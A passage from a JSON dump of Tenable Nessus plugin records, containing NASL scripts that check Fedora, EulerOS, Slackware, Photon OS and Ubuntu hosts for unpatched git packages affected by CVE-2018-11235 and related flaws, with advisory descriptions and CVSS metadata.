: git (2018-75f7624a9f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is 
missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security fixes related to .gitmodules handling. From the\n[upstream\nannouncement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct\n.c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules\n file, but we blindly append them to $GIT_DIR/modules to\n create our on-disk repo paths. This means you can do bad\n things by putting '../' into the name. We now enforce\n some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of\n concept from which the test script was adapted goes to\n Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks\n paths on NTFS into reading random piece of memory\n (CVE-2018-11233). ```\n\nA preliminary patch to resolve an issue with zlib on aarch64 is also\nincluded (RHBZ#1582555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-75f7624a9f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"git-2.17.1-2.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T12:40:21", "description": "According to the versions of the git packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. 
An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : git (EulerOS-SA-2019-1385)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000117", "CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1385.NASL", "href": "https://www.tenable.com/plugins/nessus/124888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124888);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000117\",\n \"CVE-2018-11235\"\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : git (EulerOS-SA-2019-1385)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the git packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following 
vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design\n in which hooks are not obtained from a remote\n server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling\n of 'ssh' URLs has been discovered in Git. An attacker\n could use this flaw to execute shell commands with the\n privileges of the user running the Git client, for\n example, when performing a 'clone' action on a\n malicious repository or a legitimate repository\n containing a malicious commit.(CVE-2017-1000117)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1385\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51d87829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2017-1000117');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-20.h1\",\n \"perl-Git-1.8.3.1-20.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:53:58", "description": "New git packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix security issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-04T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : git (SSA:2018-152-01)", "bulletinFamily": "scanner", 
"cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:git", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2018-152-01.NASL", "href": "https://www.tenable.com/plugins/nessus/110308", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-152-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110308);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"SSA\", value:\"2018-152-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : git (SSA:2018-152-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New git packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.582338\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?507f1b36\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", 
pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"git\", pkgver:\"2.17.1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.17.1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:43:57", "description": "An update of the git package has been released.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Git PHSA-2018-2.0-0053", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0053_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/121953", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0053. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121953);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"Photon OS 2.0: Git PHSA-2018-2.0-0053\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-53.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security 
Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-debuginfo-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-debuginfo-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-lang-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-lang-2.17.1-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:09", "description": "Etienne Stalmans discovered that git did not properly 
validate git submodules files. A remote attacker could possibly use this to craft a git repo that causes arbitrary code execution when 'git clone\n--recurse-submodules' is used. (CVE-2018-11235)\n\nIt was discovered that an integer overflow existed in git's pathname sanity checking code when used on NTFS filesystems. An attacker could use this to cause a denial of service or expose sensitive information.\n(CVE-2018-11233).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 / 18.04 LTS : git vulnerabilities (USN-3671-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:git", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-3671-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110395", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3671-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110395);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"USN\", value:\"3671-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 / 18.04 LTS : git vulnerabilities (USN-3671-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Etienne Stalmans discovered that git did not properly validate git\nsubmodules files. A remote attacker could possibly use this to craft a\ngit repo that causes arbitrary code execution when 'git clone\n--recurse-submodules' is used. (CVE-2018-11235)\n\nIt was discovered that an integer overflow existed in git's pathname\nsanity checking code when used on NTFS filesystems. An attacker could\nuse this to cause a denial of service or expose sensitive information.\n(CVE-2018-11233).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3671-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. 
